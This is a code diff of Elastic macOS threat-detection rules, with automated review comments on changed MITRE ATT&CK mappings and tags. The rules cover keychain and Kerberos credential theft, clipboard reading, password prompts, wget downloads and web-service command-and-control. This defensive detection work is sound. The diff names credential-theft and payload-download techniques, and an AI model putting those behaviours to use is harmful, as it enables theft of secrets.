--- a/rules/macos/collection_sensitive_file_access_followed_by_compression.toml +++ b/rules/macos/collection_sensitive_file_access_followed_by_compression.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -80,22 +80,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1074" -name = "Data Staged" -reference = "https://attack.mitre.org/techniques/T1074/" - -[[rule.threat.technique.subtechnique]] -id = "T1074.001" -name = "Local Data Staging" -reference = "https://attack.mitre.org/techniques/T1074/001/" - -[[rule.threat.technique]] -id = "T1560" -name = "Archive Collected Data" -reference = "https://attack.mitre.org/techniques/T1560/" - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" + [rule.threat.tactic] + name = "Collection" + id = "TA0009" + reference = "https://attack.mitre.org/tactics/TA0009/" + + [[rule.threat.technique]] + name = "Data Staged" + id = "T1074" + reference = "https://attack.mitre.org/techniques/T1074/" + + [[rule.threat.technique.subtechnique]] + name = "Local Data Staging" + id = "T1074.001" + reference = "https://attack.mitre.org/techniques/T1074/001/" + + [[rule.threat.technique]] + name = "Archive Collected Data" + id = "T1560" + reference = "https://attack.mitre.org/techniques/T1560/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/macos/command_and_control_aws_s3_connection_via_script.toml b/rules/macos/command_and_control_aws_s3_connection_via_script.toml index d1e76b8309b..2128dd0828a 100644 --- a/rules/macos/command_and_control_aws_s3_connection_via_script.toml 
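Review bot: A new `[[rule.threat]]` entry for Exfiltration (TA0010) is added with no technique, and no hunk in this patch touches this file's tags line, so `Tactic: Exfiltration` is likely missing from `tags` and the tactic tags will not match the threat mapping. Either add the technique that justifies exfiltration for an access-then-compress sequence together with `"Tactic: Exfiltration",` in the tags list, or drop the entry. The tags line is outside this hunk, so confirm it does not already list the tactic.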
+++ b/rules/macos/command_and_control_aws_s3_connection_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -50,7 +50,14 @@ This rule flags macOS script interpreters (AppleScript, Node.js, Python) that re risk_score = 47 rule_id = "05f2b649-dc03-4e9a-8c4e-6762469e8249" severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "esql" query = ''' FROM logs-endpoint.events.network-* 
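Review bot: `Tactic: Exfiltration` is removed from the tags list, but the threat hunk that follows in this file keeps the Exfiltration entry (TA0010 with T1567.002 Exfiltration to Cloud Storage), so tags and threat mapping now disagree. Either restore `"Tactic: Exfiltration",` after `"Tactic: Command and Control",` or remove the TA0010 entry; for a rule about S3 connections from script interpreters the tag looks like the one to keep.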
@@ -71,30 +78,30 @@ FROM logs-endpoint.events.network-* [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[[rule.threat.technique.subtechnique]] -id = "T1567.002" -name = "Exfiltration to Cloud Storage" -reference = "https://attack.mitre.org/techniques/T1567/002/" + [[rule.threat.technique]] + name = "Exfiltration Over Web Service" + id = "T1567" + reference = "https://attack.mitre.org/techniques/T1567/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique.subtechnique]] + name = "Exfiltration to Cloud Storage" + id = "T1567.002" + reference = "https://attack.mitre.org/techniques/T1567/002/" diff --git a/rules/macos/command_and_control_executable_download_via_wget.toml b/rules/macos/command_and_control_executable_download_via_wget.toml index 2e29febee49..6cc39502d2a 100644 --- a/rules/macos/command_and_control_executable_download_via_wget.toml +++ b/rules/macos/command_and_control_executable_download_via_wget.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] 
@@ -73,12 +73,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "User Execution" + id = "T1204" + reference = "https://attack.mitre.org/techniques/T1204/" + + [[rule.threat.technique.subtechnique]] + name = "Malicious File" + id = "T1204.002" + reference = "https://attack.mitre.org/techniques/T1204/002/" diff --git a/rules/macos/command_and_control_google_calendar_c2_via_script.toml b/rules/macos/command_and_control_google_calendar_c2_via_script.toml index 00cfc509299..9d68b0d613a 100644 --- a/rules/macos/command_and_control_google_calendar_c2_via_script.toml +++ b/rules/macos/command_and_control_google_calendar_c2_via_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] 
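Review bot: A new Execution entry (TA0002 with T1204.002 Malicious File) is added, but no hunk in this patch touches the file's tags line, so `Tactic: Execution` is likely missing from `tags` and the tactic tags will not match the threat mapping. Add `"Tactic: Execution",` to the tags list unless it is already present.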
@@ -24,7 +24,15 @@ references = [
 risk_score = 73
 rule_id = "abc7a2be-479e-428b-b0b3-1d22bda46dd9"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
 type = "eql"
 note = """## Triage and analysis
@@ -75,17 +83,40 @@ sequence by process.entity_id with maxspan=20s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" + + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1102.001" -name = "Dead Drop Resolver" -reference = "https://attack.mitre.org/techniques/T1102/001/" + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "JavaScript" + id = "T1059.007" + reference = "https://attack.mitre.org/techniques/T1059/007/" diff --git a/rules/macos/command_and_control_network_connection_to_oast_domain.toml b/rules/macos/command_and_control_network_connection_to_oast_domain.toml index 1a6d685d035..0da1e9b9455 100644 --- a/rules/macos/command_and_control_network_connection_to_oast_domain.toml +++ b/rules/macos/command_and_control_network_connection_to_oast_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -22,7 +22,14 @@ references = [ risk_score = 73 rule_id = "54214c47-be7c-4f6b-8ef2-78832f9f8f42" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] type = "eql" note = """## Triage and analysis @@ -70,25 +77,25 @@ sequence by process.entity_id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1567" -name = "Exfiltration Over Web Service" -reference = "https://attack.mitre.org/techniques/T1567/" + [rule.threat.tactic] + name = "Exfiltration" + id = "TA0010" + reference = "https://attack.mitre.org/tactics/TA0010/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] + name = "Exfiltration Over Web Service" + id = "T1567" + reference = "https://attack.mitre.org/techniques/T1567/" 
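Review bot: In command_and_control_network_connection_to_oast_domain.toml the tags hunk `@@ -22,7 +22,14 @@` drops `"Tactic: Exfiltration"`, but the threat hunk `@@ -70,25 +77,25 @@` still maps a second `[[rule.threat]]` entry to `id = "TA0010"` / `name = "Exfiltration"` on the new side, so the tag list and the threat block disagree. Either keep `"Tactic: Exfiltration"` in `tags` or remove the Exfiltration `[[rule.threat]]` entry; a tag/tactic consistency check over `rule.threat` would report this as a missing `Tactic: ` tag.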
diff --git a/rules/macos/command_and_control_perl_outbound_network_connection.toml b/rules/macos/command_and_control_perl_outbound_network_connection.toml
index 219cadf1453..5241029aa80 100644
--- a/rules/macos/command_and_control_perl_outbound_network_connection.toml
+++ b/rules/macos/command_and_control_perl_outbound_network_connection.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/01/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/09"
 [rule]
 author = ["Elastic"]
@@ -50,7 +50,15 @@ This rule detects Perl starting on macOS and then initiating an outbound connect
 risk_score = 47
 rule_id = "aba3bc11-e02f-4a03-8889-d86ea1a44f76"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
 sequence by process.entity_id with maxspan=30s
@@ -66,12 +74,30 @@ sequence by process.entity_id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Application Layer Protocol" + id = "T1071" + reference = "https://attack.mitre.org/techniques/T1071/" + + [[rule.threat.technique.subtechnique]] + name = "Web Protocols" + id = "T1071.001" + reference = "https://attack.mitre.org/techniques/T1071/001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" diff --git a/rules/macos/command_and_control_potential_etherhiding_c2.toml b/rules/macos/command_and_control_potential_etherhiding_c2.toml index 75546cf0d82..d6eb9a913f6 100644 --- a/rules/macos/command_and_control_potential_etherhiding_c2.toml +++ b/rules/macos/command_and_control_potential_etherhiding_c2.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/03" [rule] author = ["Elastic"] 
@@ -22,7 +22,15 @@ references = [
 risk_score = 73
 rule_id = "bba8c7d1-172b-435d-9034-02ed9289c628"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Execution",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide"
+]
 type = "eql"
 note = """## Triage and analysis
@@ -72,17 +80,45 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" + + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" + + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" -[[rule.threat.technique.subtechnique]] -id = "T1102.002" -name = "Bidirectional Communication" -reference = "https://attack.mitre.org/techniques/T1102/002/" + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "JavaScript" + id = "T1059.007" + reference = "https://attack.mitre.org/techniques/T1059/007/" diff --git a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml index f56d62b60f8..ba69a5cda68 100644 --- a/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml 
+++ b/rules/macos/command_and_control_suspicious_curl_to_google_app_script.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -80,22 +80,22 @@ sequence by process.entity_id with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" + [rule.threat.tactic] + name = "Command and Control" + id = "TA0011" + reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat.technique.subtechnique]] -id = "T1102.003" -name = "One-Way Communication" -reference = "https://attack.mitre.org/techniques/T1102/003/" + [[rule.threat.technique]] + name = "Ingress Tool Transfer" + id = "T1105" + reference = "https://attack.mitre.org/techniques/T1105/" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat.technique]] + name = "Web Service" + id = "T1102" + reference = "https://attack.mitre.org/techniques/T1102/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique.subtechnique]] + name = "Bidirectional Communication" + id = "T1102.002" + reference = "https://attack.mitre.org/techniques/T1102/002/" diff --git a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml index 3777c19d34f..cd1e4aa5a67 100644 --- a/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml +++ b/rules/macos/command_and_control_unusual_connection_to_suspicious_top_level_domain.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/03/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/07" [rule] author = ["Elastic"] @@ -85,10 +85,16 @@ id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml index 33c46e2cb91..9a0859fd9b0 100644 --- a/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml +++ b/rules/macos/command_and_control_unusual_network_connection_to_suspicious_web_service.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/26" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -188,15 +188,11 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique]] -id = "T1102" -name = "Web Service" -reference = "https://attack.mitre.org/techniques/T1102/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.executable", "destination.domain"] diff --git a/rules/macos/credential_access_high_volume_of_pbpaste.toml b/rules/macos/credential_access_high_volume_of_pbpaste.toml index 91617be6e37..8cf8dad2102 100644 --- a/rules/macos/credential_access_high_volume_of_pbpaste.toml 
+++ b/rules/macos/credential_access_high_volume_of_pbpaste.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/12" integration = ["endpoint", "jamf_protect"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.investigate]] @@ -88,7 +88,15 @@ Jamf Protect is integrated into the Elastic Agent using Fleet. Upon configuratio - Click "Save and Continue". """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Collection", "Data Source: Jamf Protect", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Jamf Protect", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -100,13 +108,14 @@ sequence by host.hostname, host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1115" -name = "Clipboard Data" -reference = "https://attack.mitre.org/techniques/T1115/" +id = "T1056" +name = "Input Capture" +reference = "https://attack.mitre.org/techniques/T1056/" + [rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_kerberosdump_kcc.toml b/rules/macos/credential_access_kerberosdump_kcc.toml index 793106b873c..e566cdb00e5 100644 --- a/rules/macos/credential_access_kerberosdump_kcc.toml +++ b/rules/macos/credential_access_kerberosdump_kcc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
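Review bot: The new mapping in `@@ -100,13 +108,14 @@` of credential_access_high_volume_of_pbpaste.toml is T1056 Input Capture under TA0006, but pbpaste reads the clipboard, which ATT&CK describes under T1115 Clipboard Data (Collection), the mapping the old side had. If the rule is meant to be classified as credential theft, consider keeping T1115 alongside T1056 so the technique still names what the query observes; the tags hunk is consistent with the new tactic, so both hunks need to move together. The hunk also adds a trailing `+` blank line after the tactic `reference`, which several other threat hunks in this patch do as well and looks like a formatter artifact worth removing.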
@@ -101,18 +101,24 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1003" +name = "OS Credential Dumping" +reference = "https://attack.mitre.org/techniques/T1003/" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] -id = "T1558.005" -name = "Ccache Files" -reference = "https://attack.mitre.org/techniques/T1558/005/" +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml index 8fdfc554d3f..d1bc68892c1 100644 --- a/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml +++ b/rules/macos/credential_access_keychain_pwd_retrieval_security_cmd.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/06" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] 
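Review bot: The subtechnique in `@@ -101,18 +101,24 @@` of credential_access_kerberosdump_kcc.toml changes from T1558.005 Ccache Files to T1558.003 Kerberoasting, but the rule is about dumping the Kerberos credential cache with kcc, which is what T1558.005 describes; Kerberoasting is a different technique (cracking service-ticket material) and does not match this detection. Keep `id = "T1558.005"` / `name = "Ccache Files"` / `reference = "https://attack.mitre.org/techniques/T1558/005/"` as the subtechnique; adding T1003 OS Credential Dumping as a parent-level technique is fine on its own.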
@@ -107,18 +107,29 @@ Keychain is macOS's secure storage system for managing user credentials, includi [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" reference = "https://attack.mitre.org/techniques/T1555/001/" + +[[rule.threat.technique]] +id = "T1555" +name = "Credentials from Password Stores" +reference = "https://attack.mitre.org/techniques/T1555/" +[[rule.threat.technique.subtechnique]] +id = "T1555.003" +name = "Credentials from Web Browsers" +reference = "https://attack.mitre.org/techniques/T1555/003/" + + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/macos/credential_access_mitm_localhost_webproxy.toml b/rules/macos/credential_access_mitm_localhost_webproxy.toml index 2090aa8ae6e..356443d7e15 100644 --- a/rules/macos/credential_access_mitm_localhost_webproxy.toml +++ b/rules/macos/credential_access_mitm_localhost_webproxy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -103,13 +103,14 @@ Web proxy settings in macOS manage how web traffic is routed, often used to enha [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" +id = "T1539" +name = "Steal Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1539/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + 
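Review bot: The new side of `@@ -107,18 +107,29 @@` in credential_access_keychain_pwd_retrieval_security_cmd.toml declares `[[rule.threat.technique]]` for T1555 twice, once carrying T1555.001 and once T1555.003. In this array-of-tables layout both subtechniques belong under a single technique entry: one `[[rule.threat.technique]]` block for T1555 followed by two `[[rule.threat.technique.subtechnique]]` blocks. A duplicate-technique check over `rule.threat` would presumably report the repeated entry, and the second copy is noise for anyone reading the mapping.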
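Review bot: `@@ -103,13 +103,14 @@` of credential_access_mitm_localhost_webproxy.toml replaces T1557 Adversary-in-the-Middle with T1539 Steal Web Session Cookie. The rule name and the hunk's context line describe changing macOS web proxy settings to route traffic through a local proxy, which is the T1557 behaviour; cookie theft is at most a possible consequence, not what the detection observes. Keep T1557 as the technique and, if cookie theft is the concern, add T1539 as a second `[[rule.threat.technique]]` rather than swapping.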
diff --git a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
index f6ff2838586..24d5fa1fbd2 100644
--- a/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
+++ b/rules/macos/credential_access_promt_for_pwd_via_osascript.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/16"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/02/02"
 [rule]
 author = ["Elastic"]
@@ -47,7 +47,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g
 For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).
 """
 severity = "high"
-tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -105,36 +112,19 @@ OSASCRIPT is a macOS utility that allows the execution of AppleScript and other [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1056" name = "Input Capture" reference = "https://attack.mitre.org/techniques/T1056/" - [[rule.threat.technique.subtechnique]] id = "T1056.002" name = "GUI Input Capture" reference = "https://attack.mitre.org/techniques/T1056/002/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml index 8cdf00243f1..26ee109c54d 100644 --- a/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml +++ b/rules/macos/credential_access_python_sensitive_file_access_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] 
@@ -73,32 +73,10 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1539" -name = "Steal Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1539/" - -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.004" -name = "Private Keys" -reference = "https://attack.mitre.org/techniques/T1552/004/" - [[rule.threat.technique]] id = "T1555" name = "Credentials from Password Stores" reference = "https://attack.mitre.org/techniques/T1555/" - [[rule.threat.technique.subtechnique]] id = "T1555.001" name = "Keychain" @@ -108,6 +86,7 @@ reference = "https://attack.mitre.org/techniques/T1555/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [rule.new_terms] field = "new_terms_fields" value = 